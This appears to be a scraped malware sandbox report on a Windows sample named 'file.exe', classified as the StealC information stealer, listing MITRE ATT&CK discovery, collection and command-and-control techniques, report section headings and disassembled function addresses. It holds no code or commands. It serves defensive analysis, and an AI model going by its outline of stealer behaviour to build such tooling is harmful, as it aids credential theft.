Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
file.exe

Function 00E29BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 00E14610 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 00E162D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191
networkfileCOMMON

Function 00E27690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106
memoryCOMMON

Function 00E29F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00E148D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Function 00E25760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383
sleepCOMMON

Function 00E219F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162
COMMON

Function 00E26C90 Relevance: 9.1, APIs: 6, Instructions: 89
sleepCOMMON

Function 00E11220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
COMMON

Function 00E26D93 Relevance: 6.0, APIs: 4, Instructions: 30
sleepCOMMON

Function 00E14800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
stringnetworkCOMMON

Function 00E25440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
COMMON